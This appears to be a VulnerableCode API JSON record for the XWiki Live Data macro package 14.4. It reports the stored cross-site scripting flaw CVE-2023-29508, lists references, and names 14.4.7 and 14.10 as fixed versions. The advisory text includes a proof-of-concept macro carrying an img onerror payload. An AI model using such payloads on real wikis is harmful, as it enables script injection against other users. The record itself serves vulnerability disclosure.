{"url":"http://public2.vulnerablecode.io/api/packages/64660?format=json","purl":"pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro@14.4","type":"maven","namespace":"org.xwiki.platform","name":"xwiki-platform-livedata-macro","version":"14.4","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"14.4.7","latest_non_vulnerable_version":"14.10","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44924?format=json","vulnerability_id":"VCID-cawb-zpmc-b3dp","summary":"org.xwiki.platform:xwiki-platform-livedata-macro vulnerable to Basic Cross-site Scripting\nA user without script rights can introduce a stored XSS by using the Live Data macro, if the last author of the content of the page has script rights.\n\nFor instance, by adding the LiveData below in the about section of the profile of a user created by an admin.\n\n```javascript\n{{liveData id=\"movies\" properties=\"title,description\"}}\n{\n\"data\": {\n\"count\": 1,\n\"entries\": [\n{\n\"title\": \"Meet John Doe\",\n\"url\": \"https://www.imdb.com/title/tt0033891/\",\n\"description\": \"<img onerror='alert(1)' src='foo' />\"\n}\n]\n},\n\"meta\": {\n\"propertyDescriptors\": [\n{\n\"id\": \"title\",\n\"name\": \"Title\",\n\"visible\": true,\n\"displayer\": {\"id\": \"link\", \"propertyHref\": \"url\"}\n},\n{\n\"id\": \"description\",\n\"name\": \"Description\",\n\"visible\": true,\n\"displayer\": \"html\"\n}\n]\n}\n}\n{{/liveData}}\n```","references":[{"reference_url":"https://github.com/xwiki/xwiki-platform","reference_id":"","reference_type":"","scores":[],"url":"https://github.com/xwiki/xwiki-platform"},{"reference_url":"https://jira.xwiki.org/browse/XWIKI-20312","reference_id":"","reference_type":"","scores":[],"url":"https://jira.xwiki.org/browse/XWIKI-20312"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29508","reference_id":"CVE-2023-29508","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29508"},{"reference_url":"https://github.com/advisories/GHSA-hmm7-6ph9-8jf2","reference_id":"GHSA-hmm7-6ph9-8jf2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-hmm7-6ph9-8jf2"},{"reference_url":"https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-hmm7-6ph9-8jf2","reference_id":"GHSA-hmm7-6ph9-8jf2","reference_type":"","scores":[],"url":"https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-hmm7-6ph9-8jf2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64127?format=json","purl":"pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro@14.4.7","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro@14.4.7"},{"url":"http://public2.vulnerablecode.io/api/packages/64662?format=json","purl":"pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro@14.10","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro@14.10"}],"aliases":["CVE-2023-29508","GHSA-hmm7-6ph9-8jf2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cawb-zpmc-b3dp"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro@14.4"}